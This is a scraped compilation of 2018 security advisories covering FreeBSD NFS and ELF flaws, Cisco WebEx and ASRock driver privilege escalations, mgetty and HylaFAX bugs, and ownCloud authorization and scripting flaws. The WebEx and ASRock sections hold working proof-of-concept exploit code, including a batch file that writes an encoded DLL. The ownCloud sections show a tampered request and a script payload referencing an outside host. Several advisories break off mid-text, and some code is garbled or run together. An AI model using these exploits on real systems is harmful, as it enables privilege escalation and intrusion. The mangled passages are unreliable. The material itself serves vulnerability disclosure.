-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:13.nfsSecurity Advisory The FreeBSD Project Topic: Multiple vulnerabilities in NFS server code Category: core Module: nfs Announced: 2018-11-27 Credits:Jakub Jirasek, Secunia Research at Flexera Affects:All supported versions of FreeBSD. Corrected: 2018-11-23 20:41:54 UTC (stable/11, 11.2-STABLE) 2018-11-27 19:42:16 UTC (releng/11.2, 11.2-RELEASE-p5) CVE Name: CVE-2018-17157, CVE-2018-17158, CVE-2018-17159 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Network File System (NFS) allows a host to export some or all of its file systems so that other hosts can access them over the network and mount them as if they were local. FreeBSD includes both server and client implementations of NFS. II. Problem Description Insufficient and improper checking in the NFS server code could cause a denial of service or possibly remote code execution via a specially crafted network packet. III. Impact A remote attacker could cause the NFS server to crash, resulting in a denial of service, or possibly execute arbitrary code on the server. IV. Workaround No workaround is available, but systems that do not provide NFS services are not vulnerable. Additionally, it is highly recommended the NFS service port (default port number 2049) is protected via a host or network based firewall to prevent arbitrary, untrusted clients from being able to connect. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.2] # fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch # fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch.asc # gpg --verify nfs.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/11/r340854 releng/11.2/ r341088 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://www.flexerasoftware.com/enterprise/company/about/secunia-research/> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17157> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17158> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17159> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:13.nfs.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlv9n85fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKJEg//Umbe1QOUgV0Z6EsdlQffNMo9MHbAz75vCqeaibI36Ng9vmkLKGlS6nCA 5mKFS+BvM5CkekBaiQ6BR8t0xWsrFwX6JCUayQ2FsCSo4rwCZms3AIbvt68vjQAm xWuQIMJzYku5+kALtcXXvVkLhMCaioVDpZmuPCO+rY79OVM4xP1MsnTfqEZSNo+n Cz2urH4eO60YsM8w05coQ3hnOsUjTCk8yCh3+R/uYK1VouLDgD8q96T1eG2ozny6 vwEMK3AjmcpvFkTIF3/2I6TTA5K+Zd+nqzhzPM5HjbLZmdQV02NHcoGaZrK1wsQw D+3wf8icBMfLt9rTUbEqVdvg5FRDkTo8/dH1wY85gWZ2wsSgCqI2wRuqBH4bp3bb Gcf2+D4vgX6YY5cZ/wFDcYWpghhrmXUbgnH7PnyVfYB0Ufta9utgMOQKMS0mUWwM DlHP+fL/A8lhPvXIhl1DtSa/TQAiAdMG1Jwkt
[CORE-2018-0011] - Cisco WebEx Meetings Elevation of Privilege Vulnerability
SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ Cisco WebEx Meetings Elevation of Privilege Vulnerability *1. *Advisory Information** Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability Advisory ID: CORE-2018-0011 Advisory URL: http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability Date published: 2018-11-27 Date of last update: 2018-11-27 Vendors contacted: Cisco Release mode: Coordinated release *2. *Vulnerability Information** Class: OS command injection [CWE-78] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2018-15442 *3. *Vulnerability Description** Cisco's Webex Meetings website states that [1]: Cisco Webex Meetings: Simply the Best Video Conferencing and Online Meetings. With Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters. A vulnerability in the update service of Cisco Webex Meetings Desktop App for Windows could allow a local attacker to elevate privileges. This vulnerability is related to a previous security issue fixed by Cisco in October. *4. *Vulnerable Packages* *. Cisco Webex Meetings Desktop App releases prior to 33.6.4 . Cisco Webex Productivity Tools releases 32.6.0 and later prior to 33.0.6 *5. *Vendor Information, Solutions and Workarounds** Cisco released a new fixed version and updated its security notice: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181024-webex-injection *6. *Credits** This vulnerability was discovered and researched by Marcos Accossatto from SecureAuth Exploits' Writers Team. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. *7. *Technical Description / Proof of Concept Code** *7.1. *Privilege Escalation** [CVE-2018-15442] The update service of Cisco Webex Meetings Desktop App for Windows does not properly validate user-supplied parameters. An unprivileged local attacker could exploit this vulnerability by invoking the update service command with a crafted argument. This will allow the attacker to run arbitrary commands with SYSTEM user privileges. The vulnerability can be exploited by copying to an a local attacker controller folder, the ptUpdate.exe binary. Also, a malicious dll must be placed in the same folder, named wbxtrace.dll. To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 "attacker-controlled-path" (if the parameter 1 doesn't work, then 2 should be used) Proof of Concept: /- REM Contents of PoC.bat REM This batch will copy the ptUpdate.exe from the installation folder to the current folder REM Then it will generate a simple dll that will execute notepad.exe on load. The dll will be created using certutil.exe and named wbxtrace.dll REM Finally, the webexservice service will be started, with the showed parameters REM The result should be a notepad.exe with SYSTEM user privileges @echo off :CheckOS IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT) :64BIT copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" . GOTO END :32BIT copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" . GOTO END :END echo TVqQAAME//8AALgAQAAAsA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJACVyJXZ0an7itGp+4rRqfuKLYnpitOp+4pftuiK1Kn7ilJpY2jRqfuKAABQRQAATAEEALCa5 > dll.txt echo VsAAOAADiELAQUMAAIGABAQIAAAEAAQAgAABAQEAABQBAAA3GEAAAIAABAAABAAEAAAEBBgIAAANQggAAAoAEwAAA >> dll.txt echo AAIAAACC50ZXh0nQAQAgQAACAAAGAucmRhdGEAAJUAIAIGAABAAABALmRhdGEQADACCAAAQAAAwC5yZWxvYwAAGAB >> dll.txt echo AAgoAAEAAAEIA >> dll.txt echo A >> dll.txt echo FWL7IPErIN9DAF1NGoAakSNRbxQ6DcAAADHRbxEjUWsUI1FvFBqAGoAagBqAGoAagBoADAAEGoA
[CORE-2018-0005] - ASRock Drivers Elevation of Privilege Vulnerabilities
SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ ASRock Drivers Elevation of Privilege Vulnerabilities 1. *Advisory Information* Title: ASRock Drivers Elevation of Privilege Vulnerabilities Advisory ID: CORE-2018-0005 Advisory URL: https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities Date published: 2018-10-25 Date of last update: 2018-10-25 Vendors contacted: ASRock Release mode: Coordinated release 2. *Vulnerability Information* Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712 3. *Vulnerability Description* ASRock's website states that [1]: ASRock Inc. is established in 2002, specialized in the field of motherboards. With the 3C design concept, Creativity, Consideration, Cost-effectiveness, the company explores the limit of motherboards manufacturing while paying attention on the eco issue at the same time, developing products with the consideration of eco-friendly concept. ASRock has been growing fast and become world third largest motherboard brand with headquarter in Taipei, Taiwan and branches in Europe and the USA. ASRock offers several utilities designed to give the user with an ASRock motherboard more control over certain settings and functions. These utilities include various features like the RGB LED control, hardware monitor, fan controls, and overclocking/voltage options. Multiple vulnerabilities were found in AsrDrv101.sys and AsrDrv102.sys low level drivers, installed by ASRock RGBLED and other ASRock branded utilities, which could allow a local attacker to elevate privileges. 4. *Vulnerable Packages* . ASRock RGBLED before v1.0.35.1 . A-Tuning before v3.0.210 . F-Stream before v3.0.210 . RestartToUEFI before v1.0.6.2 5. *Vendor Information, Solutions and Workarounds* ASRock published the following fixed applications for each of its motherboards models: . ASRock RGBLED v1.0.36 . A-Tuning v3.0.216 . F-Stream v3.0.216 . RestartToUEFI v1.0.7 Downloads are available on the ASRock website. 6. *Credits* These vulnerabilities were discovered and researched by Diego Juarez. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. 7. *Technical Description / Proof of Concept Code* ASRock's RBGLED, A-Tuning, F-Stream, RestartToUEFI, and possibly others, use a low level driver to program and query the status on embedded ICs on their hardware. Fan curves, clock frequencies, LED colors, thermal performance, and other user customizable properties and monitoring functionality are exposed to applications through this low level kernel driver. The main subjects of this advisory are the device drivers installed/loaded by these utilities (AsrDrv101.sys and ArsDrv102.sys). >From now on addressed as "AsrDrv". Default installation allows non-privileged user processes (even running at LOW INTEGRITY) to get a HANDLE and issue IOCTL codes to the driver. The following sections describe the problems found. 7.1. *CR register access* [CVE-2018-10709] AsrDrv exposes functionality to read and write CR register values. This could be leveraged in a number of ways to ultimately run code with elevated privileges. /- // Asrock RGBLED PoC demonstrating non-privileged access to CR registers #include #include #define IOCTL_ASROCK_READCR 0x22286C #define IOCTL_ASROCK_WRITECR 0x222870 HANDLE ghDriver = 0; #pragma pack (push,1) typedef struct _ASROCK_CR_STRUCT { ULONG64 reg; ULONG64 value; } ASROCK_CR_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ ULONG64 outbuffer[2] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID), ##size##, (LPVOID)outbuffer, sizeof(outbuffer), , NULL); \ return outbuffer[1]; \ ULONG64 ASROCK_ReadCR(DWORD reg) { ASROCK_CR_STRUCT inbuffer = { 3, 0}; IOCTLMACRO(IOCTL_ASROCK_READCR, 10) } ULONG64 ASROCK_WriteCR(DWORD reg, ULONG64 value) { ASROCK_CR_STRUCT inbuffer = { reg, value}; IOCTLMACRO(IOCTL_ASROCK_WRITECR, 10) } BOOL InitDriver() { char szDeviceName[] = ".\\AsrDrv101"; ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError()); return FALSE; } return TRUE; } int main(int argc, char* argv[]) { printf("Asrock RGBLED PoC (CR access) - pnx!/CORE\n"); if (!InitDriver()) {
X41 D-Sec GmbH Security Advisory X41-2018-007: Multiple Vulnerabilities in mgetty
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2018-007 Multiple Vulnerabilities in mgetty == Overview - Confirmed Affected Versions: 1.2.0 Patched Versions: 1.2.1 Vendor: mgetty Vendor URL: http://mgetty.greenie.net Credit: X41 D-Sec GmbH, Eric Sesterhenn Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-007-mgetty Summary and Impact - -- Multiple issues have been identified in the mgetty fax software. These might be used by local users to elevate their privileges. X41 did not perform a full test or audit on the software. Product Description - --- - From the vendor: For those of you that do not know mgetty+sendfax yet: it's a reliable and proven fax send and receive solution for unix and Linux. But it can do much more... so read the docs and be surprised. Shell injection via faxq-helper === Severity Rating: Medium Vector: Fax Job CVE: CVE-2018-16741 CWE: 78 CVSS Score: 6.1 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N In fax/faxq-helper.c function do_activate(), not all characters are properly sanitized to prevent command injection. It is possible to use ||, && or > to change the control flow. {% highlight c %} /* replace all quote characters, backslash and ';' by '' */ for( q = buf; *q != '\0'; q++ ) { if ( *q == '\'' || *q == '"' || *q == '`' || *q == '\' || *q == ';' ) { *q = ''; } } {% endhighlight %} A job file containing malicious input can be constructed using faxq-helper activate . One faxrunq is started, the code is executed as the user running the command. {% highlight bash %} /* replace all quote characters, backslash and ';' by '' */ # " '\$ ; command=tr -d '\042\047\140\134\044\073' (pwd ? 0 : 1)) badlogin(tbuf); failures = 0; } (void)strcpy(tbuf, username); {% endhighlight %} Stack Based Buffer Overflow With Long Argument in contrib/scrts.c = Severity Rating: Low Vector: Command Line Parameter CVE: CVE-2018-16742 CWE: 121 CVSS Score: 2.9 CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N In file contrib/scrts.c a stack buffer overflow can be triggered via command line parameter. {% highlight c %} int main( int argc, char ** argv ) { int i, fd; struct termios tio; char device[1000]; for ( i=1; i/dev/null 2>&1", MAILER, mailto ); pipefp = popen( buf, "w" ); {% endhighlight %} Endless loop in g3/g32pbm.c === When converting g32 files using g3/g32pbm.c, an endless loop can be triggered by malformed input file. Example can be found at files/g32pmbinfiniteloop. Out Of Bounds Access in g3/pbm2g3.c === When converting pbm files using g3/pbm2g3.c, out of bounds accesses can occur with malformed input files in putwhitespan(). An example can be found with files/pbm2g2oobaccess. {% highlight c %} putcode( twhite[l].bitcode, twhite[l].bitlength ); {% endhighlight %} Workaround - -- None. Timeline - 2018-06-07 Issues found 2018-08-27 Issue reported to vendor 2018-08-28 Vendor reply 2018-09-08 Vendors sends patches 2018-09-08 CVE IDs requested 2018-09-09 CVE IDs assigned 2018-09-11 Patched Version released 2018-09-11 Advisory released About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. - -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 Geschäftsführer: Markus Vervier -BEGIN PGP SIGNATURE- iQJLBAEBCAA1FiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlui40AXHGFkdmlzb3Jp ZXNAeDQxLWRzZWMuZGUACgkQo5Klpg50CxDAKg/6AmXcOmQnCDVgORX9xbmLvCXc EcfNX7MNKlvegdm4D0TWb9WZKbWC0ubv1vSMB35qtYKMtdIwh/lYReb01/+WmRwV alZTSnoPZmy3Wt0e1mzkSEjJqauawbVAZfi9bfgUmX1faWDkntkoOhfJVcGy2Tia g0eiang5lg1v4m5yjiE4EHyzBKy+DqEYf6VNCje7cIQG/tFhuvatmd1HulZpFgK5 D/VBRCctKXaLNuoe5cIRmRD2tJZ4O7NmhudBVxJSrShTtv4cO0M6xPD0ddzhSHtn JnuNdqYY0+sdVO+uf9kOF8qHG6iW1fLKiQAuyYZCTCZELDOUzby1x0IN2XwNxiX4 b2sl1vp/XoPvlIloZehTOtaYZimUjoSo65nMZb5Dlnc5zjkWHitD8CSSnuTJbuUQ NL9b4IYJjGqjuTl9UAbdi4dXLUEgiXe4gTr399LqFKyRwYj1CJ5LKR+C6F1YW6FG y8BoT4JGUd269HcQMUhO2
X41 D-Sec GmbH Security Advisory X41-2018-008: Multiple Vulnerabilities in HylaFAX
X41 D-SEC GmbH Security Advisory: X41-2018-008 Multiple Vulnerabilities in HylaFAX === Overview Confirmed Affected Versions: HylaFAX 6.0.6, HylaFAX+ 5.6.0 Confirmed Patched Versions: HylaFAX 6.0.7, HylaFAX+ 5.6.1 Vendor: Hylafax, Hylafax+ Vendor URL: https://www.hylafax.org/, http://hylafax.sourceforge.net/ Credit: X41 D-SEC GmbH, Luis Merino, Eric Sesterhenn, Markus Vervier Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-008-Hylafax/ Summary and Impact -- Severity Rating: Critical Vector: Incoming fax call CVE: CVE-2018-17141 CWE: 122, 457 CVSS Score: 9.0 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H Multiple bugs were found in the code handling fax page reception in JPEG format that allow arbitrary writes to an uninitialized pointer by remote parties dialing in. When processing an specially crafted input, the issue could lead to remote code execution. Although JPEG reception is not announced as an available capability by HylaFAX and is explicitly disabled during capabilities announcement, there is code for JPEG support in HylaFAX that can be reached by a remote party when setting certain flags during session negotiation. X41 did not perform a full test or audit on the software. Product Description --- HylaFAX is an open-source system for sending and receiving faxes using one or multiple fax modems. Analysis X41 discovered several vulnerabilities in HylaFAX that are exploitable by local or remote attackers. Uninitialized pointer write in FaxModem::writeECMData() --- In CopyQuality.c++:990 recvRow is initialized only when params.jp is exactly JP_GREY or JP_COLOR and also params.df is exactly zero. {% highlight c %} uint dataform = params.df + (params.jp ? params.jp + 4 : 0); //... switch (dataform) { //... case JPGREY+4: case JPCOLOR+4: recvEOLCount = 0; recvRow = (uchar) malloc(10241000); // 1M should do it? {% endhighlight %} However, later in the same function recvRow is used as a target for memcpy() when params.jp is JP_GREY or JP_COLOR, irrespective of params.df. Consequently, if a sender crafts a DCS signal that leads to params.df being non-zero while params.jp is JP_GREY or JP_COLOR, then recvRow will be uninitialized when it is used as a target for memcpy(). {% highlight c %} if (params.jp != JPGREY && params.jp != JPCOLOR) { flushRawData(tif, 0, (const u_char) buf, cc); } else { memcpy(recvRow, (const char) buf, cc); recvRow += cc; } {% endhighlight %} Out of bounds write in FaxModem::writeECMData() --- The same piece of code for memcpy at CopyQuality.c++:1045 can be abused to perform an out of bounds write to recvRow, as there is no bounds check before writing to and incrementing recvRow. This can lead to remote code execution when an attacker sends an specially crafted input. Out of bounds write in FaxModem::recvPageDLEData() -- CopyQuality:c++:446 presents another unbounded memcpy that can be abused to perform an out of bounds write to recvRow. {% highlight c %} if (n >= RCVBUFSIZ) flushRawData(tif, 0, (const u_char) raw, n); else { memcpy(recvRow, (const char) raw, n); recvRow += n; } {% endhighlight %} The code doesn't seem to be reachable, as JPEG flag forces ECM reception. Workaround -- None. Timeline 2018-06-07 Issues found 2018-08-24 Issue reported to vendor 2018-09-02 Vendor sends patches 2018-09-17 CVE ID assigned 2018-09-18 Patches released 2018-09-19 Advisory released External links == See https://www.x41-dsec.de/lab/blog/fax/ for a blog post related to this advisory. About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. - -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 Geschäftsführer: Markus Vervier
FreeBSD Security Advisory FreeBSD-SA-18:12.elf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:12.elfSecurity Advisory The FreeBSD Project Topic: Improper ELF header parsing Category: core Module: kernel Announced: 2018-09-12 Credits:Thomas Barabosch, Fraunhofer FKIE; Mark Johnston Affects:All supported versions of FreeBSD. Corrected: 2018-09-12 05:02:11 UTC (stable/11, 11.1-STABLE) 2018-09-12 05:07:35 UTC (releng/11.2, 11.2-RELEASE-p3) 2018-09-12 05:07:35 UTC (releng/11.1, 11.1-RELEASE-p14) 2018-09-12 05:03:30 UTC (stable/10, 10.4-STABLE) 2018-09-12 05:07:35 UTC (releng/10.4, 10.4-RELEASE-p12) CVE Name: CVE-2018-6924 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background To execute a binary the kernel must parse the ELF header to determine the entry point address, the program interpreter, and other parameters. II. Problem Description Insufficient validation was performed in the ELF header parser, and malformed or otherwise invalid ELF binaries were not rejected as they should be. III. Impact Execution of a malicious ELF binary may result in a kernel crash or may disclose kernel memory. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +30 "Rebooting for security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-18:12/elf.patch # fetch https://security.FreeBSD.org/patches/SA-18:12/elf.patch.asc # gpg --verify elf.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r338605 releng/10.4/ r338606 stable/11/r338604 releng/11.1/ r338606 releng/11.2/ r338606 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6924> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:12.elf.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAluYoK9fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKA+BAApeUtPHpy5mEHC8ftJ+3NZpfI8gcfuPE0dlJi6CpXq8/ruXN5Yt5X0E0l hlbNGqEMckfe3F81rCXLbtu0zeAnSBfAFcm9xSBa6aSRfP4GAZtKDKwilPqqT9F8 sOrPR/mAfxWmWcfDt8ggAx6akr2Tt48t7TiBP/kA14+CzVmp/pMU/ceFDLk8JYjY PQzVM4fHC5xeBWtA2JjMNHnhR6XMeiDOLkgeRiRW1LhB/OwWwcb0uzVixxR34mCT vFm1eJteAitoVclgnI//GkzZZ6b7SZkqyqODWKVLWXaYgb8/Z6SaKAQm2TWuHPEh nzIpPGhnXZc+36Nn9/HYDKVn3skD1sYAnTMgPcUYZH3KfkohvFdHlnoGqkcnMwTy mSKkQx9ojuLfwot7tyJCbgU/6e82ed1g9EiFZXwW8x4ePClaAvrDozz0QGwlXgyY 1jBbFp/gYznhxTetVRHo5ug5SHZgD2Ye46TCoglHX0CprhkWwpKenoCEyfyjlHXH uI+RPd46TlQfuK4bqURRpWvNWprXGqQ0ypFVW2JJgqLPBX0QS79gzqO++C8tRqQv e16mqzBGNIre/8FOCBpV/Z61NgxqeYo2ndHxc9VTMiFXK/2v3TDK9AvYZ1/xEvwC IRpC+qo870B5XT/ihC/KpYI4jgM2/pK/Mdez6Q4s5M6eeCBHAgw= =J/a5 -END PGP SIGNATURE-
CSNC-2018-015 - ownCloud Impersonate - Authorization Bypass
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: ownCloud Impersonate # Vendor: ownCloud # CSNC ID: CSNC-2018-015 # CVE ID: N/A # Subject: Authorization bypass # Risk: High # Effect: Remotely exploitable # Author: Thierry Viaccoz # Date: 29.08.2018 # # Introduction: - ownCloud [1] is a suite of client-server software for creating file hosting services and using them. An app called Impersonate [2] was created to allow administrators to impersonate other users. According to the documentation [3], group admins should only be able to access users of the groups they are administrator of. Compass Security discovered that it was possible for a group admin to impersonate any user, except global administrators. This way, group admins have access to data of users of other groups, even though they shouldn't. Affected: - Vulnerable: * Version 0.1.2 Not vulnerable: * Version 0.2.0 No other version was tested, but it is believed for the older versions to be vulnerable too. Technical Description - In order to reproduce the vulnerability, follow the steps below. Create two groups: * group1 * group2 Create four users as follows: * test1; group = group1; group admin = group1 * test2; group = group1; group admin = no group * test3; group = group2; group admin = group2 * test4; group = group2; group admin = no group Activate the Impersonate app in Settings > Admin > Apps. Go to Settings > Admin > Apps > User Authentication, check "Allow group admins to impersonate users from these groups" and add the two groups "group1" and "group2". Log in with "test1", open the user page and impersonate the user "test2". There, intercept the POST request to /apps/impersonate/user and replace "target=test2" by "target=test3" in the body as shown below. As a result, the user "test1" will impersonate the user "test3", even though "test1" is only group admin of "group1" and "test3" is not in this group. Request: = POST /apps/impersonate/user HTTP/1.1 Host: demo.owncloud.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: [CUT] OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 12 Cookie: [CUT] Connection: close target=test3 = Response: = HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Content-Length: 2 Content-Security-Policy: default-src 'none';manifest-src 'self';script-src 'self' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self' Content-Type: application/json; charset=utf-8 Date: Thu, 15 Mar 2018 15:21:14 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache Strict-Transport-Security: max-age=15768000; preload X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-Xss-Protection: 1; mode=block Connection: close [] = Workaround / Fix: - Check the authorization consistently to prevent group admins to be able to impersonate users from other groups. Timeline: - 2018-08-29: Coordinated public disclosure date 2018-04-17: Release of fixed version 0.2.0 2018-03-16: Initial vendor response 2018-03-16: Initial vendor notification 2018-03-15: Discovery by Thierry Viaccoz References: --- [1] https://owncloud.org/ [2] https://marketplace.owncloud.com/apps/impersonate [3] https://doc.owncloud.org/server/10.0/admin_manual/issues/impersonate_users.html
CSNC-2018-016 - ownCloud iOS Application - Cross-Site Scripting
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: ownCloud iOS Application (owncloud.iosapp) [1] # Vendor: ownCloud Gmbh # CSNC ID: CSNC-2018-016 # CVE ID: N/A # Subject: Cross-Site Scripting in ownCloud iOS Application's WebViews # Risk: Low # Effect: Remotely exploitable # Author: Sylvain Heiniger # Date: 14.08.2018 # # Introduction: - HTML pages will be rendered in a WebView in the ownCloud iOS application. JavaScript will be executed in this WebView when previewing an HTML file. The webview is run in a sandbox, so no other data can be read a priori. However, in case the WebView iself were to have a vulnerability, an attacker could access other data of the application. The HTML rendering could also be misused for phishing. Affected: - Vulnerable: * ownCloud Version 3.7.3 for iOS Not vulnerable: * ownCloud Android Application * ownCloud Server * ownCloud Version 3.7.5 for iOS Technical Description - Send an html file to an ownCloud instance, open it in the iOS application, HTML gets interpreted. $ cat test.html https://hes.xss.ht"</a>;> alert("this JavaScript is interpreted!"); $dave -u admin -p [password] https://[your-instance].owncloud-demo.com/remote.php/webdav/ dave> put test.html put https://7pswlqfpkn.owncloud-demo.com/remote.php/webdav/test.html (117 bytes) (success) Workaround / Fix: - Since iOS 8 one can use the WKWebView class instead of using UIWebView. Setting the WKPreferences property javaScriptEnabled to false will prevent JavaScript to be run. This fixed has been implemented in release 3.7.5 [2]. Timeline: - 2018-08-14: Advisory publication 2018-07-09: Fix verification 2018-06-19: Release with fix publication 2018-03-16: Initial acknowledgment of the vulnerability 2018-03-14: Contact via HackerOne 2018-03-13: Discovery by Sylvain Heiniger References: --- [1] https://github.com/owncloud/ios [2] https://github.com/owncloud/ios/releases/tag/version_3.7.5
CSNC-2018-023 - Atmosphere Framework - Reflected Cross-Site Scripting (XSS)
